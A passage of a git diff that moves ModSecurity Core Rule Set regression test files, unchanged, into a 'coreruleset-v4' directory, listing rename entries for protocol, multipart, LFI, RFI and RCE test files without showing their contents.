a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921190.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921190.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921190.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921190.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921200.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921200.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921200.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921200.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921210.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921210.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921210.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921210.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921220.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921220.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921220.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921220.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921230.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921230.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921230.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921230.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921240.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921240.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921240.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921240.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921421.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921421.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921421.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921421.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921422.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921422.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921422.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921422.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-922-MULTIPART-ATTACK/922100.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-922-MULTIPART-ATTACK/922100.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-922-MULTIPART-ATTACK/922100.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-922-MULTIPART-ATTACK/922100.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-922-MULTIPART-ATTACK/922110.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-922-MULTIPART-ATTACK/922110.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-922-MULTIPART-ATTACK/922110.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-922-MULTIPART-ATTACK/922110.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-922-MULTIPART-ATTACK/922120.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-922-MULTIPART-ATTACK/922120.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-922-MULTIPART-ATTACK/922120.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-922-MULTIPART-ATTACK/922120.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930100.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930100.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930100.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930100.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930110.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930110.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930110.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930110.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930120.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930120.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930120.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930120.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930121.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930121.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930121.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930121.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930130.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930130.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930130.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930130.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931100.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931100.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931100.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931100.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931110.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931110.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931110.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931110.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931120.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931120.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931120.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931120.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931130.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931130.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931130.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931130.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931131.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931131.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931131.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931131.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932120.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932120.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932120.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932120.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932125.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932125.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932125.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932125.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932130.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932130.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932130.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932130.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932131.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932131.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932131.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932131.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932140.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932140.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932140.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932140.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932160.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932160.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932160.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932160.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932161.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932161.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932161.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932161.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932170.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932170.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932170.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932170.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932171.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932171.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932171.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932171.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932175.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932175.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932175.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932175.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932180.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932180.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932180.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932180.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932190.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932190.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932190.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932190.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932200.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932200.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932200.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932200.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932205.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932205.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932205.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932205.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932206.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932206.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932206.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932206.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932210.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932210.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932210.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932210.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932220.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932220.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932220.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932220.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932230.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932230.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932230.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932230.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932231.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932231.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932231.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932231.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932232.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932232.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932232.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932232.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932235.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932235.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932235.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932235.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932236.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932236.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932236.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932236.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932237.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932237.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932237.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932237.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932238.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932238.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932238.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932238.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932239.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932239.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932239.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932239.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932240.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932240.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932240.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932240.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932250.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932250.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932250.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932250.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932260.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932260.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932260.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932260.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932300.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932300.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932300.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932300.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932301.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932301.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932301.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932301.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932310.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932310.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932310.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932310.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932311.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932311.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932311.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932311.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932320.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932320.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932320.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932320.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932321.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932321.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932321.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932321.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932330.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932330.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932330.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932330.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932331.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932331.yaml similarity index 100% rename from 